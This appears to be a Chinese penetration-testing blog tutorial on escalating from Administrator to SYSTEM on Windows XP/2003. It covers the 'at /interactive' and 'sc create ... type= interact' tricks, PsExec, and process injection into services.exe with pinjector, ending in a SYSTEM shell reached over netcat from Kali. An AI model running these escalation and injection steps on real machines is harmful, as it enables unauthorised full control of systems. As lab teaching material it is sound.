渗透测试之提权:利用 Windows 系统命令和进程注入提权
一、本地提权
• 已实现本地低权限账号登录
• 远程溢出
• 直接获得账号密码
• 希望获取更高权限
• 实现对目标进一步控制
• 系统账号之间权限隔离
• 操作系统安全的基础
• 用户空间
• 内核空间
• 系统账号
• 用户账号登陆时获取权限令牌
• 服务账号无需用户登陆已在后台启动服务
• Windows
• user
• Administrator
• System
• Linux
• User
• Root
二、ADMIN提权为SYSTEM
HelpAssistant账户
此帐户是在系统安装过程中创建并具有为远程协助操作准备功能,创建时被随意分配一个复杂的密码,随后被禁用。当远程协助邀请打开时,用户的电脑上会创建一个“邀请者”的票证,同时3389端口也会打开,并允许到终端服务的访问,这时HelpAssistant账户会被自动启用。启用后受邀者可以使用这个账户和创建的票证访问邀请者的计算机。如果所有的票证都被关闭或者过期,HelpAssistant账户会被再次自动被禁用,3389端口也会同时关闭。
Support_388945a0 帐户
此帐户存在使帮助和支持服务可以与签名脚本交互操作。主要用于控制对签名脚本(可以从帮助和支持服务内部访问)的访问权限。管理员可以使用此帐户来委派普通用户(对计算机没有管理权限)的能力,以便从嵌入帮助和支持服务内部的链接运行签名脚本。可以对这些脚本进行编程,以使Support_388945a0 帐户凭据(而不是用户凭据)在本地计算机上执行特定的管理操作,而普通用户的帐户不支持这种操作。当委派用户单击帮助和支持服务中的链接时,将在 Support_388945a0 帐户的安全上下文中执行脚本。此帐户对计算机具有有限的访问权限,并且在默认情况下是禁用的。
1、at 命令
只能在XP与2003的系统上使用
Help:
C:\Documents and Settings\Administrator>at /? The AT command schedules commands and programs to run on a computer at a specified time and date. The Schedule service must be running to use the AT command. AT [\\computername] [ [id] [/DELETE] | /DELETE [/YES]] AT [\\computername] time [/INTERACTIVE] [ /EVERY:date[,...] | /NEXT:date[,...]] "command" \\computername Specifies a remote computer. Commands are scheduled on the local computer if this parameter is omitted. id Is an identification number assigned to a scheduled command. /delete Cancels a scheduled command. If id is omitted, all the scheduled commands on the computer are canceled. /yes Used with cancel all jobs command when no further confirmation is desired. time Specifies the time when command is to run. /interactive Allows the job to interact with the desktop of the user who is logged on at the time the job runs. /every:date[,...] Runs the command on each specified day(s) of the week or month. If date is omitted, the current day of the month is assumed. /next:date[,...] Runs the specified command on the next occurrence of the day (for example, next Thursday). If date is omitted, the current day of the month is assumed. "command" Is the Windows NT command, or batch program to be run.
示例:
C:\Documents and Settings\Administrator>at 12:11 /interactive cmd #/interactive 交互执行(也就是说咋们可以看得见,而不是后台运行) Added a new job with job ID = 1 C:\Documents and Settings\Administrator>at Status ID Day Time Command Line ------------------------------------------------------------------------------- 1 Today 12:11 PM cmd
当前cmd为system权限!
使用taskmgr命令杀死现administrator权限下的桌面进程explorer,再重启explorer,则整个桌面进程将在system权限下。
2、sc 命令
示例
创建服务:
C:\Documents and Settings\Administrator>sc Create syscmd binPath= "cmd /K start" type= own type= interact #syscmd:创建的服务名,binPath:指定要执行的指令,cmd /K start:重新启动一个cmd窗口,own:创建账户所拥有,interact:交互 [SC] CreateService SUCCESS
启动服务:
sc start syscmd
通过命令行启动服务的指令,服务默认是由system账号启动的,所以执行该命令syscmd会去调用system账号去启动它
3、提权工具
windows系统提供的套件(推荐将整个套件下载下来玩玩):https://docs.microsoft.com/zh-cn/sysinternals/downloads/
具体工具:PsExec.exe
帮助信息:
C:\>PsExec.exe PsExec v2.34 - Execute processes remotely Copyright (C) 2001-2021 Mark Russinovich Sysinternals - www.sysinternals.com PsExec executes a program on a remote system, where remotely executed console applications execute interactively. Usage: psexec [\\computer[,computer2[,...] | @file]][-u user [-p psswd]][-n s][- r servicename][-h][-l][-s|-e][-x][-i [session]][-c [-f|-v]][-w directory][-d][-< priority>][-a n,n,...][-verbose] cmd [arguments] -a Separate processors on which the application can run with commas where 1 is the lowest numbered CPU. For example, to run the application on CPU 2 and CPU 4, enter: "-a 2,4" -c Copy the specified program to the remote system for execution. If you omit this option the application must be in the system path on the remote system. -d Don't wait for process to terminate (non-interactive). -e Does not load the specified account's profile. -f Copy the specified program even if the file already exists on the remote system. -i Run the program so that it interacts with the desktop of the specified session on the remote system. If no session is specified the process runs in the console session. -h If the target system is Vista or higher, has the process run with the account's elevated token, if available. -l Run process as limited user (strips the Administrators group and allows only privileges assigned to the Users group). On Windows Vista the process runs with Low Integrity. -n Specifies timeout in seconds connecting to remote computers. -p Specifies optional password for user name. If you omit this you will be prompted to enter a hidden password. -r Specifies the name of the remote service to create or interact. with. -s Run the remote process in the System account. -u Specifies optional user name for login to remote computer. -v Copy the specified file only if it has a higher version number or is newer on than the one on the remote system. -w Set the working directory of the process (relative to remote computer). -x Display the UI on the Winlogon secure desktop (local system only). -arm Specifies the remote computer is of ARM architecture. -priority Specifies -low, -belownormal, -abovenormal, -high or -realtime to run the process at a different priority. Use -background to run at low memory and I/O priority on Vista. computer Direct PsExec to run the application on the remote computer or computers specified. If you omit the computer name PsExec runs the application on the local system, and if you specify a wildcard (\\*), PsExec runs the command on all computers in the current domain. @file PsExec will execute the command on each of the computers listed in the file. cmd Name of application to execute. arguments Arguments to pass (note that file paths must be absolute paths on the target system). -accepteula This flag suppresses the display of the license dialog. -nobanner Do not display the startup banner and copyright message. You can enclose applications that have spaces in their name with quotation marks e.g. psexec \\marklap "c:\long name app.exe". Input is only passed to the remote system when you press the enter key, and typing Ctrl-C terminates the remote process. If you omit a user name the process will run in the context of your account on the remote system, but will not have access to network resources (because it is impersonating). Specify a valid user name in the Domain\User syntax if the remote process requires access to network resources or to run in a different account. Note that the password and command is encrypted in transit to the remote system. Error codes returned by PsExec are specific to the applications you execute, not PsExec.
示例:
三、注入进程提权
原理:将自己的进程注入到 system 服务进程中,使其具有 system 账号权限(隐蔽性强)。
pinjector.exe进程注入器(外网):http://www.tarasco.org/security/Process_Injector/
帮助信息:
C:\>pinjector.exe Privilege Switcher for Win32(Private version) (c) 2006 Andres Tarasco - atarasco@gmail.com Usage: inject.exe -l (Enumerate Credentials) inject.exe -p <pid> <cmd> <port> (Inject into PID)
示例
查看可注入进程:
C:\>pinjector.exe -l Privilege Switcher for Win32(Private version) (c) 2006 Andres Tarasco - atarasco@gmail.com PID 564 smss.exe ( 3 Threads) USER: \\NT AUTHORITY\SYSTEM PID 612 csrss.exe ( 11 Threads) USER: \\NT AUTHORITY\SYSTEM PID 636 winlogon.exe ( 19 Threads) USER: \\NT AUTHORITY\SYSTEM PID 680 services.exe ( 16 Threads) USER: \\NT AUTHORITY\SYSTEM PID 692 lsass.exe ( 20 Threads) USER: \\NT AUTHORITY\SYSTEM PID 856 vmacthlp.exe ( 1 Threads) USER: \\NT AUTHORITY\SYSTEM PID 868 svchost.exe ( 19 Threads) USER: \\NT AUTHORITY\SYSTEM PID 1064 svchost.exe ( 54 Threads) USER: \\NT AUTHORITY\SYSTEM 001400: \\NT AUTHORITY\SYSTEM 001412: \\NT AUTHORITY\SYSTEM PID 1404 spoolsv.exe ( 11 Threads) USER: \\NT AUTHORITY\SYSTEM PID 1592 HistorySvr.exe ( 4 Threads) USER: \\NT AUTHORITY\SYSTEM PID 1616 inetinfo.exe ( 27 Threads) USER: \\NT AUTHORITY\SYSTEM PID 1668 sntlkeyssrvr.exe ( 9 Threads) USER: \\NT AUTHORITY\SYSTEM PID 1844 spnsrvnt.exe ( 7 Threads) USER: \\NT AUTHORITY\SYSTEM PID 1864 SLadmin.exe ( 5 Threads) USER: \\NT AUTHORITY\SYSTEM PID 1940 SLSmtp.exe ( 19 Threads) USER: \\NT AUTHORITY\SYSTEM PID 1976 vmtoolsd.exe ( 4 Threads) USER: \\NT AUTHORITY\SYSTEM PID 192 VMUpgradeHelper.exe ( 3 Threads) USER: \\NT AUTHORITY\SYSTEM PID 3292 explorer.exe ( 5 Threads) USER: \\NT AUTHORITY\SYSTEM PID 1768 explorer.exe ( 20 Threads) USER: \\DH-CA8822AB9589\Administrator PID 3840 wscntfy.exe ( 1 Threads) USER: \\DH-CA8822AB9589\Administrator PID 2172 VMwareTray.exe ( 1 Threads) USER: \\DH-CA8822AB9589\Administrator PID 1516 VMwareUser.exe ( 8 Threads) USER: \\DH-CA8822AB9589\Administrator PID 3176 ICQLite.exe ( 11 Threads) USER: \\DH-CA8822AB9589\Administrator PID 3528 PSEXESVC.exe ( 3 Threads) USER: \\NT AUTHORITY\SYSTEM PID 2552 cmd.exe ( 1 Threads) USER: \\DH-CA8822AB9589\Administrator PID 2420 pinjector.exe ( 1 Threads) USER: \\DH-CA8822AB9589\Administrator
以注入 services.exe 进程为例:
Kali 用 nc 测试
xp的IP地址:
Kali:
root@kali:~# nc 10.10.10.131 5555 Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32>whoami whoami NT AUTHORITY\SYSTEM C:\WINDOWS\system32>
不忘初心,方得始终。
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· Linux系列:如何用 C#调用 C方法造成内存泄露
· AI与.NET技术实操系列(二):开始使用ML.NET
· 记一次.NET内存居高不下排查解决与启示
· 探究高空视频全景AR技术的实现原理
· 理解Rust引用及其生命周期标识(上)
· DeepSeek 开源周回顾「GitHub 热点速览」
· 物流快递公司核心技术能力-地址解析分单基础技术分享
· .NET 10首个预览版发布:重大改进与新特性概览!
· AI与.NET技术实操系列(二):开始使用ML.NET
· 单线程的Redis速度为什么快?